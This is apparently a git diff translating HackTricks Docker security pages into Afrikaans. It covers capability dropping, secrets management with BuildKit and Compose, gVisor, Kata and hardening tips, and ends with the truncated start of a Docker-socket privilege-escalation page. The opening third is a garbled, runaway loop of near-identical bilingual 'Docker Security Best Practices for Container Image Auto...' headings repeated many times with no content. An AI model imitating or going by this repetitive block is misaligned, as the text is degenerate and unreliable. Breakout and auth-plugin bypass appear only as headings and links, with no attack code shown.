Beste Praktyke vir Houvermonitering + +--- + +#### Docker Security Best Practices for Container Logging + +#### Docker Sekuriteit Beste Praktyke vir Houverlog + +--- + +#### Docker Security Best Practices for Container Tracing + +#### Docker Sekuriteit Beste Praktyke vir Houvernaspeuring + +--- + +#### Docker Security Best Practices for Container Vulnerability Scanning + +#### Docker Sekuriteit Beste Praktyke vir Houverkwesbaarheidsskandering + +--- + +#### Docker Security Best Practices for Container Image Scanning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldskandering + +--- + +#### Docker Security Best Practices for Container Image Signing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldondertekening + +--- + +#### Docker Security Best Practices for Container Image Hardening + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverharding + +--- + +#### Docker Security Best Practices for Container Image Lifecycle Management + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldlewenssiklusbestuur + +--- + +#### Docker Security Best Practices for Container Image Registry + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldregister + +--- + +#### Docker Security Best Practices for Container Image Repository + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldbewaarplek + +--- + +#### Docker Security Best Practices for Container Image Distribution + +#### Docker Sekuriteit Beste Praktyke vir Houverbeelddistribusie + +--- + +#### Docker Security Best Practices for Container Image Updates + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldopdaterings + +--- + +#### Docker Security Best Practices for Container Image Versioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldweergawes + +--- + +#### Docker Security Best Practices for Container Image Tagging + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldmerking + +--- + +#### Docker Security Best Practices for Container Image Pulling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldtrekking + +--- + +#### Docker Security Best Practices for Container Image Pushing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldstoot + +--- + +#### Docker Security Best Practices for Container Image Building + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldbou + +--- + +#### Docker Security Best Practices for Container Image Packaging + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverpakking + +--- + +#### Docker Security Best Practices for Container Image Distribution + +#### Docker Sekuriteit Beste Praktyke vir Houverbeelddistribusie + +--- + +#### Docker Security Best Practices for Container Image Validation + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldgeldigheid + +--- + +#### Docker Security Best Practices for Container Image Verification + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverifikasie + +--- + +#### Docker Security Best Practices for Container Image Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldimplementering + +--- + +#### Docker Security Best Practices for Container Image Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldterugrol + +--- + +#### Docker Security Best Practices for Container Image Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldopruiming + +--- + +#### Docker Security Best Practices for Container Image Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldrugsteun + +--- + +#### Docker Security Best Practices for Container Image Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldherstel + +--- + +#### Docker Security Best Practices for Container Image Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldmigrasie + +--- + +#### Docker Security Best Practices for Container Image Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverdubbeling + +--- + +#### Docker Security Best Practices for Container Image Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldskaling + +--- + +#### Docker Security Best Practices for Container Image Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldlasbalansering + +--- + +#### Docker Security Best Practices for Container Image High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldhoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldfouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Disaster Recovery + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldrampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Healing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese genesing + +--- + +#### Docker Security Best Practices for Container Image Auto Repair + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + +--- + +#### Docker Security Best Practices for Container Image Auto Update + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opdatering + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + +--- + +#### Docker Security Best Practices for Container Image Auto Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese migrasie + +--- + +#### Docker Security Best Practices for Container Image Auto Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese verdubbeling + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese lasbalansering + +--- + +#### Docker Security Best Practices for Container Image Auto High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese hoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Auto Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese fouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Auto Disaster Recovery + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese orkestrering + +--- + +#### Docker Security Best Practices for Container Image Auto Provisioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese voorsiening + +--- + +#### Docker Security Best Practices for Container Image Auto Configuration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese konfigurasie + +--- + +#### Docker Security Best Practices for Container Image Auto Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese implementering + +--- + +#### Docker Security Best Practices for Container Image Auto Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese terugrol + +--- + +#### Docker Security Best Practices for Container Image Auto Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opruiming + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + +--- + +#### Docker Security Best Practices for Container Image Auto Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese migrasie + +--- + +#### Docker Security Best Practices for Container Image Auto Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese verdubbeling + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese lasbalansering + +--- + +#### Docker Security Best Practices for Container Image Auto High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese hoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Auto Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese fouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Auto Disaster Recovery + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese orkestrering + +--- + +#### Docker Security Best Practices for Container Image Auto Provisioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese voorsiening + +--- + +#### Docker Security Best Practices for Container Image Auto Configuration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese konfigurasie + +--- + +#### Docker Security Best Practices for Container Image Auto Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese implementering + +--- + +#### Docker Security Best Practices for Container Image Auto Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese terugrol + +--- + +#### Docker Security Best Practices for Container Image Auto Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opruiming + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + +--- + +#### Docker Security Best Practices for Container Image Auto Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese migrasie + +--- + +#### Docker Security Best Practices for Container Image Auto Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese verdubbeling + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese lasbalansering + +--- + +#### Docker Security Best Practices for Container Image Auto High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese hoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Auto Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese fouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Auto Disaster Recovery + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese orkestrering + +--- + +#### Docker Security Best Practices for Container Image Auto Provisioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese voorsiening + +--- + +#### Docker Security Best Practices for Container Image Auto Configuration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese konfigurasie + +--- + +#### Docker Security Best Practices for Container Image Auto Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese implementering + +--- + +#### Docker Security Best Practices for Container Image Auto Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese terugrol + +--- + +#### Docker Security Best Practices for Container Image Auto Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opruiming + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke ```bash #You can manually add/drop capabilities with --cap-add @@ -322,134 +1132,118 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv # You can manually disable selinux in docker with --security-opt label:disable ``` +Vir meer **`--security-opt`** opsies, kyk na: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) -For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) +## Ander Sekuriteits-oorwegings -## Other Security Considerations +### Bestuur van Geheime: Beste Praktyke -### Managing Secrets: Best Practices +Dit is noodsaaklik om te vermy dat geheime direk in Docker-beelde ingebed word of dat omgewingsveranderlikes gebruik word, aangesien hierdie metodes jou sensitiewe inligting blootstel aan enige persoon met toegang tot die houer deur bevele soos `docker inspect` of `exec`. -It's crucial to avoid embedding secrets directly in Docker images or using environment variables, as these methods expose your sensitive information to anyone with access to the container through commands like `docker inspect` or `exec`. +**Docker volumes** is 'n veiliger alternatief wat aanbeveel word vir die toegang tot sensitiewe inligting. Dit kan gebruik word as 'n tydelike lêersisteem in die geheue, wat die risiko's wat verband hou met `docker inspect` en logboekinskrywings verminder. Nietemin kan root-gebruikers en diegene met `exec`-toegang tot die houer steeds toegang verkry tot die geheime. -**Docker volumes** are a safer alternative, recommended for accessing sensitive information. They can be utilized as a temporary filesystem in memory, mitigating the risks associated with `docker inspect` and logging. However, root users and those with `exec` access to the container might still access the secrets. +**Docker geheime** bied 'n selfs veiliger metode vir die hantering van sensitiewe inligting. Vir gevalle waar geheime tydens die beeldboufase benodig word, bied **BuildKit** 'n doeltreffende oplossing met ondersteuning vir geheime tydens die boufase, wat die bou spoed verbeter en addisionele funksies bied. -**Docker secrets** offer an even more secure method for handling sensitive information. For instances requiring secrets during the image build phase, **BuildKit** presents an efficient solution with support for build-time secrets, enhancing build speed and providing additional features. +Om BuildKit te benut, kan dit op drie maniere geaktiveer word: -To leverage BuildKit, it can be activated in three ways: - -1. Through an environment variable: `export DOCKER_BUILDKIT=1` -2. By prefixing commands: `DOCKER_BUILDKIT=1 docker build .` -3. By enabling it by default in the Docker configuration: `{ "features": { "buildkit": true } }`, followed by a Docker restart. - -BuildKit allows for the use of build-time secrets with the `--secret` option, ensuring these secrets are not included in the image build cache or the final image, using a command like: +1. Deur 'n omgewingsveranderlike: `export DOCKER_BUILDKIT=1` +2. Deur bevele te voorvoeg: `DOCKER_BUILDKIT=1 docker build .` +3. Deur dit standaard in die Docker-konfigurasie te aktiveer: `{ "features": { "buildkit": true } }`, gevolg deur 'n herlaai van Docker. +BuildKit maak die gebruik van geheime tydens die boufase moontlik met die `--secret` opsie, wat verseker dat hierdie geheime nie ingesluit word in die beeldboukas of die finale beeld nie, deur 'n bevel soos die volgende te gebruik: ```bash docker build --secret my_key=my_value ,src=path/to/my_secret_file . ``` +Vir geheime wat nodig is in 'n lopende houer, bied **Docker Compose en Kubernetes** robuuste oplossings. Docker Compose maak gebruik van 'n `secrets` sleutel in die diensdefinisie om geheime lêers te spesifiseer, soos getoon in 'n voorbeeld van 'n `docker-compose.yml`: -For secrets needed in a running container, **Docker Compose and Kubernetes** offer robust solutions. Docker Compose utilizes a `secrets` key in the service definition for specifying secret files, as shown in a `docker-compose.yml` example: +```yaml +services: + myservice: + secrets: + - mysecret +secrets: + mysecret: + file: ./path/to/secret/file +``` +In hierdie voorbeeld word 'n diens genaamd `myservice` gedefinieer wat 'n geheim genaamd `mysecret` gebruik. Die geheime lêer word gespesifiseer deur die `file` sleutel in die `secrets` afdeling. ```yaml version: "3.7" services: - my_service: - image: centos:7 - entrypoint: "cat /run/secrets/my_secret" - secrets: - - my_secret +my_service: +image: centos:7 +entrypoint: "cat /run/secrets/my_secret" secrets: - my_secret: - file: ./my_secret_file.txt +- my_secret +secrets: +my_secret: +file: ./my_secret_file.txt ``` +Hierdie konfigurasie maak die gebruik van geheime moontlik wanneer dienste met Docker Compose begin word. -This configuration allows for the use of secrets when starting services with Docker Compose. - -In Kubernetes environments, secrets are natively supported and can be further managed with tools like [Helm-Secrets](https://github.com/futuresimple/helm-secrets). Kubernetes' Role Based Access Controls (RBAC) enhances secret management security, similar to Docker Enterprise. +In Kubernetes-omgewings word geheime outomaties ondersteun en kan dit verder bestuur word met gereedskap soos [Helm-Secrets](https://github.com/futuresimple/helm-secrets). Kubernetes se Rol Gebaseerde Toegangsbeheer (RBAC) verbeter die veiligheid van geheimbestuur, soortgelyk aan Docker Enterprise. ### gVisor -**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. +**gVisor** is 'n toepassingskernel, geskryf in Go, wat 'n groot gedeelte van die Linux-stelseloppervlak implementeer. Dit sluit 'n [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime genaamd `runsc` in wat 'n **isolasiegrens tussen die toepassing en die gasheerkernel** voorsien. Die `runsc` runtime integreer met Docker en Kubernetes, wat dit eenvoudig maak om gesandbokte houers te hardloop. {% embed url="https://github.com/google/gvisor" %} ### Kata Containers -**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. +**Kata Containers** is 'n oopbron-gemeenskap wat werk aan die bou van 'n veilige houer-runtime met ligte virtuele masjiene wat soos houers voel en optree, maar **sterker werklas-isolasie bied deur middel van hardeware-virtualisering** as 'n tweede verdedigingslaag. {% embed url="https://katacontainers.io/" %} -### Summary Tips +### Opsomming van Wenke -* **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag. -* Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. -* [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. -* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. -* [**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks. -* **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required. -* **Use** [**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures** or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP. -* **Regularly** **rebuild** your images to **apply security patches to the host an images.** -* Manage your **secrets wisely** so it's difficult to the attacker to access them. -* If you **exposes the docker daemon use HTTPS** with client & server authentication. -* In your Dockerfile, **favor COPY instead of ADD**. ADD automatically extracts zipped files and can copy files from URLs. COPY doesn’t have these capabilities. Whenever possible, avoid using ADD so you aren’t susceptible to attacks through remote URLs and Zip files. -* Have **separate containers for each micro-s**ervice -* **Don’t put ssh** inside container, “docker exec” can be used to ssh to Container. -* Have **smaller** container **images** +* **Moenie die `--privileged` vlag gebruik of 'n** [**Docker-aansluiting binne die houer monteer**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** Die Docker-aansluiting maak dit moontlik om houers te skep, dus is dit 'n maklike manier om volle beheer oor die gasheer te verkry, byvoorbeeld deur 'n ander houer met die `--privileged` vlag te hardloop. +* Moenie **as root binne die houer hardloop nie. Gebruik 'n** [**ander gebruiker**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **en** [**gebruikersnaamruimtes**](https://docs.docker.com/engine/security/userns-remap/)**.** Die root in die houer is dieselfde as op die gasheer tensy dit met gebruikersnaamruimtes herkartografeer word. Dit word slegs lig beperk deur Linux-naamruimtes, vermoëns en cgroups. +* [**Laat alle vermoëns vaar**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) en aktiveer slegs dié wat benodig word** (`--cap-add=...`). Baie werklaste benodig geen vermoëns nie en die byvoeging daarvan verhoog die omvang van 'n potensiële aanval. +* [**Gebruik die "no-new-privileges" veiligheidsoptie**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) om te voorkom dat prosesse meer vermoëns bekom, byvoorbeeld deur suid-binêre lêers. +* [**Beperk die hulpbronne wat beskikbaar is vir die houer**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Hulpbronbeperkings kan die masjien teen ontkenning-van-diens-aanvalle beskerm. +* **Pas** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(of SELinux)** profiele aan om die aksies en stelseloproepe wat vir die houer beskikbaar is, tot die minimum wat benodig word, te beperk. +* **Gebruik** [**amptelike Docker-beelde**](https://docs.docker.com/docker-hub/official\_images/) **en vereis handtekeninge** of bou jou eie beelde gebaseer daarop. Moenie beelde erf of gebruik wat [agterdeure](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) bevat nie. Berg ook wortelsleutels en wagwoord op 'n veilige plek op. Docker het planne om sleutels met UCP te bestuur. +* **Herbou jou beelde gereeld** om sekuriteitsopdaterings op die gasheer en beelde toe te pas. +* Bestuur jou **geheime verstandig** sodat dit moeilik is vir die aanvaller om toegang daartoe te verkry. +* As jy die Docker-daeemon blootstel, gebruik **HTTPS** met klient- en bedienerverifikasie. +* In jou Dockerfile, **gee voorkeur aan KOPIËRE in plaas van TOEVOEGEN**. TOEVOEGEN onttrek outomaties saamgepersde lêers en kan lêers vanaf URL's kopieer. KOPIËRE het nie hierdie vermoëns nie. Vermy waar moontlik die gebruik van TOEVOEGEN sodat jy nie vatbaar is vir aanvalle deur middel van afgeleë URL's en Zip-lêers nie. +* Het **afsonderlike houers vir elke mikrodiens** +* **Moenie ssh** binne die houer plaas nie, "docker exec" kan gebruik word om na die houer ssh. +* Het **kleiner** houerbeelde -## Docker Breakout / Privilege Escalation +## Docker Uitbreek / Voorregverhoging -If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**: +As jy **binne 'n Docker-houer** is of toegang het tot 'n gebruiker in die **docker-groep**, kan jy probeer om **uit te breek en voorregte te verhoog**: {% content-ref url="docker-breakout-privilege-escalation/" %} [docker-breakout-privilege-escalation](docker-breakout-privilege-escalation/) {% endcontent-ref %} -## Docker Authentication Plugin Bypass +## Docker-verifikasieplugin-omseil -If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:** +As jy toegang het tot die Docker-aansluiting of toegang het tot 'n gebruiker in die **docker-groep, maar jou aksies word beperk deur 'n Docker-verifikasieplugin**, kyk of jy dit kan **omseil:** {% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %} [authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md) {% endcontent-ref %} -## Hardening Docker +## Verharding van Docker -* The tool [**docker-bench-security**](https://github.com/docker/docker-bench-security) is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated, and are based on the [CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/).\ - You need to run the tool from the host running docker or from a container with enough privileges. Find out **how to run it in the README:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security). +* Die gereedskap [**docker-bench-security**](https://github.com/docker/docker-bench-security) is 'n skrip wat tientalle algemene beste praktyke vir die implementering van Docker-houers in produksie nagaan. Die toetse is outomaties en is gebaseer op die [CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/).\ +Jy moet die gereedskap vanaf die gasheer wat Docker hardloop, of vanaf 'n houer met genoeg voorregte, hardloop. Vind **hoe om dit in die README te hardloop:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security). -## References +## Verwysings * [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) * [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/\_fel1x/status/1151487051986087936) -* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-1overview/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-1overview/) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/) -* [https://en.wikipedia.org/wiki/Linux\_namespaces](https://en.wikipedia.org/wiki/Linux\_namespaces) -* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57) -* [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines) -* [https://docs.docker.com/engine/extend/plugins_authorization](https://docs.docker.com/engine/extend/plugins_authorization) -* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57) -* [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/) +* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container +Ander maniere om HackTricks te ondersteun: -
- -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md index e96a571b4..d891ccc9f 100644 --- a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md @@ -1,57 +1,57 @@ -# Abusing Docker Socket for Privilege Escalation +# Misbruik van Docker Socket vir Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op 